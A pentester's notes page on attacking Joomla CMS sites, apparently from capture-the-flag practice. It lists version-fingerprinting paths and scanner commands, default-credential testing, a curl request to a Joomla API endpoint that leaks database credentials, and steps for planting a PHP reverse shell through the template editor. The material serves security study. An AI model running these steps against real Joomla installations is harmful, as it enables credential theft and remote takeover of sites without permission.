Joomla CMS


Joomla is an open-source Content Management System (CMS) written in PHP. The version 5 is currently in development (2024).

You can see the repartition of active Joomla installations here.

The admin panel default URI is: /administrator.

Joomla Pentester Notes ☠️

attacking_common_applications devvortex

The /robots.txt file may contain the list of interesting paths. If the website was not properly configured, /README.txt may be accessible. It's also possible that there is a tag <meta name="generator" ...>.

It some versions, we may be able to access /administrator/manifests/files/joomla.xml, /media/system/js/, or /plugins/system/cache/cache.xml (rather unreliable and outdated) to find the version.

$ curl [...].xml | xmllint --format -
  • OWASP initiated the development of joomscan (1.0k ⭐)
$ sudo apt install joomscan
$ joomscan -u URL
[+] Detecting Joomla Version
[++] Joomla x.y.z

<SNIP... Nothing of interest>
  • You can try to use droopescan (not really useful)
$ droopescan scan joomla --url URL
<SNIP... Nothing of interest>
  • You can try to use JoomlaScan (0.1k ⭐, 2022 πŸͺ¦)
  • Default username: admin. Password set at install time. You can test default credentials using joomla-bruteforce (0.02k ⭐, 2020 πŸͺ¦) while you should not use it for brute force (it sucks...).
$ wget
$ cp /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt .
$ python -u URL -w http_default_pass.txt --username admin -v
$ curl -v URL/api/index.php/v1/config/application?public=true
"dbtype": "mysqli",
"host": "localhost",
"user": "xxx",
"password": "yyy"
"db": "joomla",

In Joomla 3, Navigate to Configuration > Templates > Templates. In Joomla 4, navigate to System > Site Templates. Select a template. Create a new file or upload one if you can. You can copy-paste a shell:

$ cat revshell.php | xclip -selection clipboard

The file path is shown in the editor, while, for reference, mine was at the URL: URL/templates/<your_selected_site_name>/revshell.php.

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • /images, /home, /media, /templates, /modules
  • /plugins, /includes, /language, /components, /api
  • /cache, /libraries, /tmp, /layouts, /administrator
  • /media/templates/site/<name>/assets/